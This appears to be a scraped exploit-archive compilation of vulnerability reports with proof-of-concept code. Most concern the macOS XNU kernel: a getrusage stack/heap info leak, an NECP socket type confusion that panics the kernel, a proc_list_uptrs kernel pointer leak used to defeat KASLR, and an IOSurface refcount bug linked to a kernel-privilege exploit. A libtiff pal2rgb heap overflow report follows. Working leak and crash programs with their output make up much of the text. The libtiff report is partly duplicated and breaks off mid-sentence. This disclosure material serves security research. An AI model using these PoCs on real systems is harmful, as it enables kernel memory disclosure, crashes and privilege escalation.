    rup = &p->p_stats->p_ru;
    rup->ru_utime = utime;
    rup->ru_stime = stime;

    rubuf = *rup;
    proc_unlock(p);

    break;
  [...]
  }
  if (IS_64BIT_PROCESS(p)) {
    retsize = sizeof(rubuf64);
    retbuf = (caddr_t)&rubuf64;
    munge_user64_rusage(&rubuf, &rubuf64);
  } else {
    [...]
  }

  return (copyout(retbuf, uap->rusage, retsize));
}

`munge_user64_rusage()` performs the conversion by copying individual fields:

__private_extern__  void 
munge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)
{
  // timeval changes size, so utime and stime need special handling 
  a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;
  a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;
  a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;
  a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;
[...]
}

`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:

#define _STRUCT_USER64_TIMEVAL    struct user64_timeval
_STRUCT_USER64_TIMEVAL
{
  user64_time_t            tv_sec;        // seconds 
  __int32_t                tv_usec;       // and microseconds 
};

struct  user64_rusage {
  struct user64_timeval ru_utime; // user time used 
  struct user64_timeval ru_stime; // system time used 
  user64_long_t ru_maxrss;    // max resident set size 
[...]
};

This padding is not initialized, but is copied to userspace.


The following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.


Just leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.
The returned data seems to come from the previous syscall:

$ cat test.c
#include <sys/resource.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

void do_leak(void) {
  static struct rusage ru;
  getrusage(RUSAGE_SELF, &ru);
  static unsigned int leak1, leak2;
  memcpy(&leak1, ((char*)&ru)+12, 4);
  memcpy(&leak1, ((char*)&ru)+28, 4);
  printf("leak1: 0x%08x\n", leak1);
  printf("leak2: 0x%08x\n", leak2);
}

int main(void) {
  do_leak();
  do_leak();
  do_leak();
  int fd = open("/dev/null", O_RDONLY);
  do_leak();
  int dummy;
  read(fd, &dummy, 4);
  do_leak();
  return 0;
}
$ gcc -o test test.c && ./test
leak1: 0x00000000
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff81
leak2: 0x00000000


However, I believe that this can also be used to disclose kernel heap memory.
When the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack
without zeroing it, so the new stack contains data from previous heap allocations.
The following testcase, when run after repeatedly reading a wordlist into memory,
leaks some non-pointer data that seems to come from the wordlist:

$ cat forktest.c 
*/

#include <sys/resource.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

void do_leak(void) {
  static struct rusage ru;
  getrusage(RUSAGE_SELF, &ru);
  static unsigned int leak1, leak2;
  memcpy(&leak1, ((char*)&ru)+12, 4);
  memcpy(&leak2, ((char*)&ru)+28, 4);
  char str[1000];
  if (leak1 != 0) {
    sprintf(str, "leak1: 0x%08x\n", leak1);
    write(1, str, strlen(str));
  }
  if (leak2 != 0) {
    sprintf(str, "leak2: 0x%08x\n", leak2);
    write(1, str, strlen(str));
  }
}

void leak_in_child(void) {
  int res_pid, res2;
  asm volatile(
    "mov $0x02000002, %%rax\n\t"
    "syscall\n\t"
  : "=a"(res_pid), "=d"(res2)
  :
  : "cc", "memory", "rcx", "r11"
  );
  //write(1, "postfork\n", 9);
  if (res2 == 1) {
    //write(1, "child\n", 6);
    do_leak();
    char dummy;
    read(0, &dummy, 1);
    asm volatile(
      "mov $0x02000001, %rax\n\t"
      "mov $0, %rdi\n\t"
      "syscall\n\t"
    );
  }
  //printf("fork=%d:%d\n", res_pid, res2);
  int wait_res;
  //wait(&wait_res);
}

int main(void) {
  for(int i=0; i<1000; i++) {
    leak_in_child();
  }
}
/*
$ gcc -o forktest forktest.c && ./forktest
leak1: 0x1b3b1320
leak1: 0x00007f00
leak1: 0x65686375
leak1: 0x410a2d63
leak1: 0x8162ced5
leak1: 0x65736168
leak1: 0x0000042b

The leaked values include the strings "uche", "c-\nA" and "hase", which could plausibly come from the wordlist.


Apart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.
*/
HireHackking 
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1392&desc=2

When getsockopt() [edited; original report said "setsockopt"] is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked.
necp_get_socket_attributes() unconditionally calls sotoinpcb(so):

    errno_t
    necp_get_socket_attributes(struct socket *so, struct sockopt *sopt)
    {
            int error = 0;
            u_int8_t *buffer = NULL;
            u_int8_t *cursor = NULL;
            size_t valsize = 0;
            struct inpcb *inp = sotoinpcb(so);

            if (inp->inp_necp_attributes.inp_domain != NULL) {
                    valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain);
            }
    [...]
    }

sotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket):

    #define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)

If necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`).


To trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots).

==============
*/

#include <sys/types.h>
#include <sys/un.h>
#include <sys/socket.h>
#include <err.h>
#include <unistd.h>

#define SO_NECP_ATTRIBUTES 0x1109

int main(void) {
  while (1) {
    int s = socket(AF_UNIX, SOCK_STREAM, 0);
    if (s == -1)
      err(1, "socket");
    getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);
    close(s);
  }
}
/*
==============

On macOS 10.13 (17A405), this causes the following crash:

==============
*** Panic Report ***
panic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers:
CR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0
RAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc
RSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8
R8:  0x0000000000000001, R9:  0xffffffff00000000, R10: 0x0000000000000000, R11: 0x0000000000000246
R12: 0xffffff80357cf7d0, R13: 0xffffff8032d69a08, R14: 0xffffff8018de3ef0, R15: 0xffffff8032ac66a8
RFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS:  0x0000000000000008, SS:  0x0000000000000010
Fault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1
==============

This bug should be usable for disclosing kernel memory.
*/
HireHackking 
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1372

the kernel libproc API proc_list_uptrs has the following comment in it's userspace header:

/*
 * Enumerate potential userspace pointers embedded in kernel data structures.
 * Currently inspects kqueues only.
 *
 * NOTE: returned "pointers" are opaque user-supplied values and thus not
 * guaranteed to address valid objects or be pointers at all.
 *
 * Returns the number of pointers found (which may exceed buffersize), or -1 on
 * failure and errno set appropriately.
 

This is a recent addition to the kernel, presumably as a debugging tool to help enumerate
places where the kernel is accidentally disclosing kernel pointers to userspace.

The implementation currently enumerates kqueues and dumps a bunch of values from them.

Here's the relevant code:

// buffer and buffersize are attacker controlled

int
proc_pidlistuptrs(proc_t p, user_addr_t buffer, uint32_t buffersize, int32_t *retval)
{
  uint32_t count = 0;
  int error = 0;
  void *kbuf = NULL;
  int32_t nuptrs = 0;

  if (buffer != USER_ADDR_NULL) {
    count = buffersize / sizeof(uint64_t);     <---(a)
    if (count > MAX_UPTRS) {
      count = MAX_UPTRS;
      buffersize = count * sizeof(uint64_t);
    }
    if (count > 0) {
      kbuf = kalloc(buffersize);               <--- (b)
      assert(kbuf != NULL);
    }
  } else {
    buffersize = 0;
  }

  nuptrs = kevent_proc_copy_uptrs(p, kbuf, buffersize);

  if (kbuf) {
    size_t copysize;
    if (os_mul_overflow(nuptrs, sizeof(uint64_t), &copysize)) {  <--- (c)
      error = ERANGE;
      goto out;
    }
    if (copysize > buffersize) {    <-- (d)
      copysize = buffersize;
    }
    error = copyout(kbuf, buffer, copysize);  <--- (e)
  }


At (a) the attacker-supplied buffersize is divided by 8 to compute the maximum number of uint64_t's
which can fit in there.

If that value isn't huge then the attacker-supplied buffersize is used to kalloc the kbuf buffer at (b).

kbuf and buffersize are then passed to kevent_proc_copy_uptrs. Looking at the implementation of
kevent_proc_copy_uptrs the return value is the total number of values it found, even if that value is larger
than the supplied buffer. If it finds more than will fit it keeps counting but no longer writes them to the kbuf.

This means that at (c) the computed copysize value doesn't reflect how many values were actually written to kbuf
but how many *could* have been written had the buffer been big enough.

If there were possible values which could have been written than there was space in the buffer then at (d) copysize
will be limited down to buffersize.

Copysize is then used at (e) to copy the contents of kbuf to userspace.

The bug is that there's no enforcement that (buffersize % 8) == 0. If we were to pass a buffersize of 15, at (a) count would be 1
as 15 bytes is only enough to store 1 complete uint64_t. At (b) this would kalloc a buffer of 15 bytes.

If the target pid actually had 10 possible values which kevent_proc_copy_uptrs finds then nuptrs will return 10 but it will
only write to the first value to kbuf, leaving the last 7 bytes untouched.

At (c) copysize will be computed at 10*8 = 80 bytes, at (d) since 80 > 15 copysize will be truncated back down to buffersize (15)
and at (e) 15 bytes will be copied back to userspace even though only 8 were written to.

Kalloc doesn't zero-initialise returned memory so this can be used to easily and safely disclose lots of kernel memory, albeit
limited to the 7-least significant bytes of each 8-byte aligned qword. That's more than enough to easily defeat kaslr.

This PoC demonstrates the disclosure of kernel pointers in the stale kalloc memory.

Tested on MacOS 10.13 High Sierra (17A365)
*/

// ianbeer

#if 0
XNU kernel memory disclosure due to bug in kernel API for detecting kernel memory disclosures

the kernel libproc API proc_list_uptrs has the following comment in it's userspace header:

/*
 * Enumerate potential userspace pointers embedded in kernel data structures.
 * Currently inspects kqueues only.
 *
 * NOTE: returned "pointers" are opaque user-supplied values and thus not
 * guaranteed to address valid objects or be pointers at all.
 *
 * Returns the number of pointers found (which may exceed buffersize), or -1 on
 * failure and errno set appropriately.
 */

This is a recent addition to the kernel, presumably as a debugging tool to help enumerate
places where the kernel is accidentally disclosing kernel pointers to userspace.

The implementation currently enumerates kqueues and dumps a bunch of values from them.

Here's the relevant code:

// buffer and buffersize are attacker controlled

int
proc_pidlistuptrs(proc_t p, user_addr_t buffer, uint32_t buffersize, int32_t *retval)
{
	uint32_t count = 0;
	int error = 0;
	void *kbuf = NULL;
	int32_t nuptrs = 0;

	if (buffer != USER_ADDR_NULL) {
		count = buffersize / sizeof(uint64_t);     <---(a)
		if (count > MAX_UPTRS) {
			count = MAX_UPTRS;
			buffersize = count * sizeof(uint64_t);
		}
		if (count > 0) {
			kbuf = kalloc(buffersize);               <--- (b)
			assert(kbuf != NULL);
		}
	} else {
		buffersize = 0;
	}

	nuptrs = kevent_proc_copy_uptrs(p, kbuf, buffersize);

	if (kbuf) {
		size_t copysize;
		if (os_mul_overflow(nuptrs, sizeof(uint64_t), &copysize)) {  <--- (c)
			error = ERANGE;
			goto out;
		}
		if (copysize > buffersize) {    <-- (d)
			copysize = buffersize;
		}
		error = copyout(kbuf, buffer, copysize);  <--- (e)
	}


At (a) the attacker-supplied buffersize is divided by 8 to compute the maximum number of uint64_t's
which can fit in there.

If that value isn't huge then the attacker-supplied buffersize is used to kalloc the kbuf buffer at (b).

kbuf and buffersize are then passed to kevent_proc_copy_uptrs. Looking at the implementation of
kevent_proc_copy_uptrs the return value is the total number of values it found, even if that value is larger
than the supplied buffer. If it finds more than will fit it keeps counting but no longer writes them to the kbuf.

This means that at (c) the computed copysize value doesn't reflect how many values were actually written to kbuf
but how many *could* have been written had the buffer been big enough.

If there were possible values which could have been written than there was space in the buffer then at (d) copysize
will be limited down to buffersize.

Copysize is then used at (e) to copy the contents of kbuf to userspace.

The bug is that there's no enforcement that (buffersize % 8) == 0. If we were to pass a buffersize of 15, at (a) count would be 1
as 15 bytes is only enough to store 1 complete uint64_t. At (b) this would kalloc a buffer of 15 bytes.

If the target pid actually had 10 possible values which kevent_proc_copy_uptrs finds then nuptrs will return 10 but it will
only write to the first value to kbuf, leaving the last 7 bytes untouched.

At (c) copysize will be computed at 10*8 = 80 bytes, at (d) since 80 > 15 copysize will be truncated back down to buffersize (15)
and at (e) 15 bytes will be copied back to userspace even though only 8 were written to.

Kalloc doesn't zero-initialise returned memory so this can be used to easily and safely disclose lots of kernel memory, albeit
limited to the 7-least significant bytes of each 8-byte aligned qword. That's more than enough to easily defeat kaslr.

This PoC demonstrates the disclosure of kernel pointers in the stale kalloc memory.

Tested on MacOS 10.13 High Sierra (17A365)
#endif

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define PRIVATE
#include <libproc.h>

uint64_t try_leak(pid_t pid, int count) {
  size_t buf_size = (count*8)+7;
  char* buf = calloc(buf_size+1, 1);

  int err = proc_list_uptrs(pid, (void*)buf, buf_size);

  if (err == -1) {
    return 0;
  }

  // the last 7 bytes will contain the leaked data:
  uint64_t last_val = ((uint64_t*)buf)[count]; // we added an extra zero byte in the calloc

  return last_val;
}

int main(int argc, char** argv) {
  for (int pid = 0; pid < 1000; pid++) {
    for (int i = 0; i < 100; i++) {
      uint64_t leak = try_leak(pid, i);
      /*
      if (leak != 0 && leak != 0x00adbeefdeadbeef) {
        printf("%016llx\n", leak);
      }
      */
      if ((leak & 0x00ffffff00000000) == 0xffff8000000000) {
        printf("%016llx\n", leak);
      }
    }
  }

  return 0;
}
HireHackking 
I have previously detailed the lifetime management paradigms in MIG in the writeups for:
  CVE-2016-7612 [https://bugs.chromium.org/p/project-zero/issues/detail?id=926]
and
  CVE-2016-7633 [https://bugs.chromium.org/p/project-zero/issues/detail?id=954]

If a MIG method returns KERN_SUCCESS it means that the method took ownership of *all* the arguments passed to it.
If a MIG method returns an error code, then it took ownership of *none* of the arguments passed to it.

If an IOKit userclient external method takes an async wake mach port argument then the lifetime of the reference
on that mach port passed to the external method will be managed by MIG semantics. If the external method returns
an error then MIG will assume that the reference was not consumed by the external method and as such the MIG
generated coode will drop a reference on the port.
 
IOSurfaceRootUserClient external method 17 (s_set_surface_notify) will drop a reference on the wake_port
(via IOUserClient::releaseAsyncReference64) then return an error code if the client has previously registered
a port with the same callback function.
 
The external method's error return value propagates via the return value of is_io_connect_async_method back to the
MIG generated code which will drop a futher reference on the wake_port when only one was taken.

This bug is reachable from the iOS app sandbox as demonstrated by this PoC.
 
Tested on iOS 11.0.3 (11A432) on iPhone 6s (MKQL2CN/A)
Tested on MacOS 10.13 (17A365) on MacBookAir5,2

------------------------------------------------------

async_wake exploit attached.

Gets tfp0 on all 64-bit devices plus an initial PoC local kernel debugger.

See the README and kdbg.c for details.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43320.zip
HireHackking 
Source: http://bugzilla.maptools.org/show_bug.cgi?id=2750

The vulnerability is triggered by ./tools/pal2rgb $FILE /dev/null

The asan debug information is below:

TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag
ignored.
TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag
ignored.
sample.tiff: JPEG compression support is not configured.
TIFFSetField: /dev/null: Unknown pseudo-tag 65537.
TIFFSetField: /dev/null: Unknown pseudo-tag 65538.
sample.tiff: JPEG compression support is not configured.
=================================================================
==29649==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x611000009fe1 at pc 0x0000004f3109 bp 0x7fff697434d0 sp 0x7fff697434c8
WRITE of size 1 at 0x611000009fe1 thread T0
    #0 0x4f3108  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108)
    #1 0x7f678dc0cf44  (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    #2 0x419ba5  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x419ba5)

0x611000009fe1 is located 0 bytes to the right of 225-byte region
[0x611000009f00,0x611000009fe1)
allocated by thread T0 here:
    #0 0x4c3f08  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4c3f08)
    #1 0x4f2748  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f2748)
    #2 0x7f678dc0cf44  (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)

SUMMARY: AddressSanitizer: heap-buffer-overflow
(/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108)
Shadow bytes around the buggy address:
  0x0c227fff93a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c227fff93f0: 00 00 00 00 00 00 00 00 00 00 00 00[01]fa fa fa
  0x0c227fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29649==ABORTING

pal2rgb allocates the output buffer(obuf) too small at tools/pal2rgb.c:188.
That cause heap overflow and lead to memory corruption in TIFFSetupStrips().

(gdb) r sample.tiff /dev/null
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/vagrant/targets/asan/tt/tools/pal2rgb sample.tiff
/dev/null
TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag
ignored.
TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag
ignored.
sample.tiff: JPEG compression support is not configured.
TIFFSetField: /dev/null: Unknown pseudo-tag 65537.
TIFFSetField: /dev/null: Unknown pseudo-tag 65538.
sample.tiff: JPEG compression support is not configured.
*** Error in `/home/vagrant/targets/asan/tt/tools/pal2rgb': malloc(): memory
corruption: 0x0000000000652160 ***

Program received signal SIGABRT, Aborted.
0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
56    ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0  0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00007ffff7745028 in __GI_abort () at abort.c:89
#2  0x00007ffff777e2a4 in __libc_message (do_abort=1,
    fmt=fmt@entry=0x7ffff7890310 "*** Error in `%s': %s: 0x%s ***\n")
    at ../sysdeps/posix/libc_fatal.c:175
#3  0x00007ffff778c584 in malloc_printerr (ptr=0x652160,
    str=0x7ffff788c4df "malloc(): memory corruption", action=<optimized out>)
at malloc.c:4998
#4  _int_malloc (av=0x7ffff7acd760 <main_arena>, bytes=24) at malloc.c:3449
#5  0x00007ffff778dae0 in __GI___libc_malloc (bytes=24) at malloc.c:2893
#6  0x00000000004122a5 in TIFFSetupStrips (tif=tif@entry=0x651b80) at
tif_write.c:545
#7  0x00000000004124b5 in TIFFWriteCheck (tif=0x651b80, tiles=<optimized out>,
    module=0x42de50 <module> "TIFFWriteScanline") at tif_write.c:613
#8  0x0000000000412a74 in TIFFWriteScanline (tif=tif@entry=0x651b80,
buf=buf@entry=0x652070,
    row=row@entry=0, sample=sample@entry=0) at tif_write.c:56
#9  0x0000000000401dbd in main (argc=<optimized out>, argv=<optimized out>) at
pal2rgb.c:200

Affected version: 4.0.9
Latest version: 4.0.9

pal2rgb allocate output buffer to convert TIFF format. The output buffer always
uses a fixed size(225).  However, when write data to output buffer, imagewidth
and imagelength of the input TIFF file are used. it lead to heap overflow.

1) get imagewidth and imagelength from input TIFF

tools/pal2rgb.c:142     TIFFGetField(in, TIFFTAG_IMAGEWIDTH, &imagewidth);
tools/pal2rgb.c:143     TIFFGetField(in, TIFFTAG_IMAGELENGTH, &imagelength);

2) allocate output buffer
tools/pal2rgb.c:188       obuf = (unsigned
char*)_TIFFmalloc(TIFFScanlineSize(out)); // TIFFScanlineSize(out) returns
always 225.

3) write data to output buffer
tools/pal2rgb.c:191         for (row = 0; row < imagelength; row++) {
tools/pal2rgb.c:192             if (!TIFFReadScanline(in, ibuf, row, 0))
tools/pal2rgb.c:193                 goto done;
tools/pal2rgb.c:194             pp = obuf;
tools/pal2rgb.c:195             for (x = 0; x < imagewidth; x++) { // HEAP
OVERFLOW!
tools/pal2rgb.c:196                 *pp++ = (unsigned char) rmap[ibuf[x]];
tools/pal2rgb.c:197                 *pp++ = (unsigned char) gmap[ibuf[x]];
tools/pal2rgb.c:198                 *pp++ = (unsigned char) bmap[ibuf[x]];
tools/pal2rgb.c:199             }
tools/pal2rgb.c:200             if (!TIFFWriteScanline(out, obuf, row, 0)) //
CRASH!
tools/pal2rgb.c:201                 goto done;
tools/pal2rgb.c:202         }

The process's heap memory was corrupted by COLORMAP/mage Width/Image Length of
the TIFF document. The offset of the corresponding values in the poc.tiff file
is shown below.

COLORMAP {
    R : 0x25~0x224
    G : 0x225~0x424
    B : 0x425~0x624
}

Image Width : 0x24FE
Image Length : 0x250A


 Note
You need to log in before you can comment on or make changes to this bug.

Description From jungun.baek 2017-11-29 00:50:42
The vulnerability is triggered by ./tools/pal2rgb $FILE /dev/null

The asan debug information is below:

TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag
ignored.
TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag
ignored.
sample.tiff: JPEG compression support is not configured.
TIFFSetField: /dev/null: Unknown pseudo-tag 65537.
TIFFSetField: /dev/null: Unknown pseudo-tag 65538.
sample.tiff: JPEG compression support is not configured.
=================================================================
==29649==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x611000009fe1 at pc 0x0000004f3109 bp 0x7fff697434d0 sp 0x7fff697434c8
WRITE of size 1 at 0x611000009fe1 thread T0
    #0 0x4f3108  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108)
    #1 0x7f678dc0cf44  (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    #2 0x419ba5  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x419ba5)

0x611000009fe1 is located 0 bytes to the right of 225-byte region
[0x611000009f00,0x611000009fe1)
allocated by thread T0 here:
    #0 0x4c3f08  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4c3f08)
    #1 0x4f2748  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f2748)
    #2 0x7f678dc0cf44  (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)

SUMMARY: AddressSanitizer: heap-buffer-overflow
(/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108)
Shadow bytes around the buggy address:
  0x0c227fff93a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c227fff93f0: 00 00 00 00 00 00 00 00 00 00 00 00[01]fa fa fa
  0x0c227fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29649==ABORTING

pal2rgb allocates the output buffer(obuf) too small at tools/pal2rgb.c:188.
That cause heap overflow and lead to memory corruption in TIFFSetupStrips().

(gdb) r sample.tiff /dev/null
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/vagrant/targets/asan/tt/tools/pal2rgb sample.tiff
/dev/null
TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag
ignored.
TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag
ignored.
sample.tiff: JPEG compression support is not configured.
TIFFSetField: /dev/null: Unknown pseudo-tag 65537.
TIFFSetField: /dev/null: Unknown pseudo-tag 65538.
sample.tiff: JPEG compression support is not configured.
*** Error in `/home/vagrant/targets/asan/tt/tools/pal2rgb': malloc(): memory
corruption: 0x0000000000652160 ***

Program received signal SIGABRT, Aborted.
0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
56    ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0  0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00007ffff7745028 in __GI_abort () at abort.c:89
#2  0x00007ffff777e2a4 in __libc_message (do_abort=1,
    fmt=fmt@entry=0x7ffff7890310 "*** Error in `%s': %s: 0x%s ***\n")
    at ../sysdeps/posix/libc_fatal.c:175
#3  0x00007ffff778c584 in malloc_printerr (ptr=0x652160,
    str=0x7ffff788c4df "malloc(): memory corruption", action=<optimized out>)
at malloc.c:4998
#4  _int_malloc (av=0x7ffff7acd760 <main_arena>, bytes=24) at malloc.c:3449
#5  0x00007ffff778dae0 in __GI___libc_malloc (bytes=24) at malloc.c:2893
#6  0x00000000004122a5 in TIFFSetupStrips (tif=tif@entry=0x651b80) at
tif_write.c:545
#7  0x00000000004124b5 in TIFFWriteCheck (tif=0x651b80, tiles=<optimized out>,
    module=0x42de50 <module> "TIFFWriteScanline") at tif_write.c:613
#8  0x0000000000412a74 in TIFFWriteScanline (tif=tif@entry=0x651b80,
buf=buf@entry=0x652070,
    row=row@entry=0, sample=sample@entry=0) at tif_write.c:56
#9  0x0000000000401dbd in main (argc=<optimized out>, argv=<optimized out>) at
pal2rgb.c:200

Affected version: 4.0.9
Latest version: 4.0.9
------- Comment #1 From jungun.baek 2017-11-29 01:44:26 -------
pal2rgb allocate output buffer to convert TIFF format. The output buffer always
uses a fixed size(225).  However, when write data to output buffer, imagewidth
and imagelength of the input TIFF file are used. it lead to heap overflow.

1) get imagewidth and imagelength from input TIFF

tools/pal2rgb.c:142     TIFFGetField(in, TIFFTAG_IMAGEWIDTH, &imagewidth);
tools/pal2rgb.c:143     TIFFGetField(in, TIFFTAG_IMAGELENGTH, &imagelength);

2) allocate output buffer
tools/pal2rgb.c:188       obuf = (unsigned
char*)_TIFFmalloc(TIFFScanlineSize(out)); // TIFFScanlineSize(out) returns
always 225.

3) write data to output buffer
tools/pal2rgb.c:191         for (row = 0; row < imagelength; row++) {
tools/pal2rgb.c:192             if (!TIFFReadScanline(in, ibuf, row, 0))
tools/pal2rgb.c:193                 goto done;
tools/pal2rgb.c:194             pp = obuf;
tools/pal2rgb.c:195             for (x = 0; x < imagewidth; x++) { // HEAP
OVERFLOW!
tools/pal2rgb.c:196                 *pp++ = (unsigned char) rmap[ibuf[x]];
tools/pal2rgb.c:197                 *pp++ = (unsigned char) gmap[ibuf[x]];
tools/pal2rgb.c:198                 *pp++ = (unsigned char) bmap[ibuf[x]];
tools/pal2rgb.c:199             }
tools/pal2rgb.c:200             if (!TIFFWriteScanline(out, obuf, row, 0)) //
CRASH!
tools/pal2rgb.c:201                 goto done;
tools/pal2rgb.c:202         }
------- Comment #2 From jungun.baek 2017-11-29 02:28:44 -------
Created an attachment (id=819) [details]
heap overflow PoC
------- Comment #3 From jungun.baek 2017-11-29 06:33:21 -------
The process's heap memory was corrupted by COLORMAP/mage Width/Image Length of
